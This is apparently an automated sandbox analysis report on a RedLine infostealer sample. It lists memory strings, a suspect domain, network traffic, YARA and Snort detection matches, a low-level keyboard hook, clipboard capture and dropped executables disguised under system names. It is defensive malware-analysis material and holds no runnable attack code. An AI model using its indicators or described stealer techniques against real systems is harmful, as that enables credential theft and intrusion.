                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8hD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/hD
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: microsofts.exe, 00000003.00000003.2510291200.0000000006930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zrlssa.biz/;:
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: microsofts.exe, 00000003.00000003.2605509231.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                        Source: microsofts.exe, 00000003.00000003.2606559361.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2606812597.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000D.00000002.2199793152.00000000074B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49704 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Installs a global keyboard hook
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\microsofts.exeJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 2.2.svchost.exe.5800000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000002.00000002.2120236907.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                        Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\cfd441acea3434e2.bin
                        Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00409A400_2_00409A40
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004120380_2_00412038
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004271610_2_00427161
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0047E1FA0_2_0047E1FA
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004212BE0_2_004212BE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004433900_2_00443390
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004433910_2_00443391
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0041A46B0_2_0041A46B
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0041240C0_2_0041240C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004465660_2_00446566
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004045E00_2_004045E0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0041D7500_2_0041D750
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004037E00_2_004037E0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004278590_2_00427859
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004128180_2_00412818
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040F8900_2_0040F890
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0042397B0_2_0042397B
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00411B630_2_00411B63
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0047CBF00_2_0047CBF0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044EBBC0_2_0044EBBC
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00412C380_2_00412C38
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044ED9A0_2_0044ED9A
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00423EBF0_2_00423EBF
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00424F700_2_00424F70
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0041AF0D0_2_0041AF0D
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0538F6300_2_0538F630
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E0D5802_2_04E0D580
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E0C7F02_2_04E0C7F0
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DD7F802_2_04DD7F80
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E037802_2_04E03780
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E100D92_2_04E100D9
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DD51EE2_2_04DD51EE
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E139A32_2_04E139A3
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E059802_2_04E05980
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DD6EAF2_2_04DD6EAF
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E1515C2_2_04E1515C
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DD7B712_2_04DD7B71
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006A7C005_2_006A7C00
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006CA8105_2_006CA810
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006D2D405_2_006D2D40
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006A79F05_2_006A79F0
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006C92A05_2_006C92A0
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006CEEB05_2_006CEEB0
                        Source: C:\Windows\System32\alg.exeCode function: 5_2_006C93B05_2_006C93B0
                        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 6_2_0159DC746_2_0159DC74
                        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 6_2_0578EE586_2_0578EE58
                        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 6_2_057888506_2_05788850
                        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 6_2_057800406_2_05780040
                        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 6_2_057800076_2_05780007
                        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 6_2_057888406_2_05788840
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 7_2_02A485B77_2_02A485B7
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 7_2_02A485C87_2_02A485C8
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_00667C0011_2_00667C00
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_0068A81011_2_0068A810
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_00692D4011_2_00692D40
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_006679F011_2_006679F0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_006892A011_2_006892A0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_0068EEB011_2_0068EEB0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 11_2_006893B011_2_006893B0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0495B49013_2_0495B490
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0495B47013_2_0495B470
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08953E9813_2_08953E98
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_05921B9417_2_05921B94
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_0592DAAC17_2_0592DAAC
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_059225B817_2_059225B8
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_059225A817_2_059225A8
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_0592256317_2_05922563
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_0592E60817_2_0592E608
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_0592417717_2_05924177
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_05921D2017_2_05921D20
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_05921B8817_2_05921B88
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 17_2_0599336017_2_05993360
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_0071A81023_2_0071A810
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_006F7C0023_2_006F7C00
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_00722D4023_2_00722D40
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_006F79F023_2_006F79F0
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_0071EEB023_2_0071EEB0
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_007192A023_2_007192A0
                        Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_007193B023_2_007193B0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009BA81025_2_009BA810
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_00997C0025_2_00997C00
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009979F025_2_009979F0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009C2D4025_2_009C2D40
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009BEEB025_2_009BEEB0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009B92A025_2_009B92A0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_009B93B025_2_009B93B0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: String function: 00445975 appears 65 times
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: String function: 0041171A appears 37 times
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: String function: 0041718C appears 45 times
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: String function: 0040E6D0 appears 35 times
                        Source: Acrobat.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                        Source: chrmstp.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                        Source: chrmstp.exe.3.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: Number of sections : 13 > 10
                        Source: elevation_service.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: elevation_service.exe0.3.drStatic PE information: Number of sections : 12 > 10
                        Source: chrmstp.exe.3.drStatic PE information: Number of sections : 14 > 10
                        Source: AENiBH7X1q.exe, 00000000.00000003.2099739381.0000000004003000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AENiBH7X1q.exe
                        Source: AENiBH7X1q.exe, 00000000.00000003.2100287405.000000000442D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AENiBH7X1q.exe
                        Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                        Source: AENiBH7X1q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: 2.2.svchost.exe.5800000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000002.00000002.2120236907.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: armsvc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ShowAppPickerForPDF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
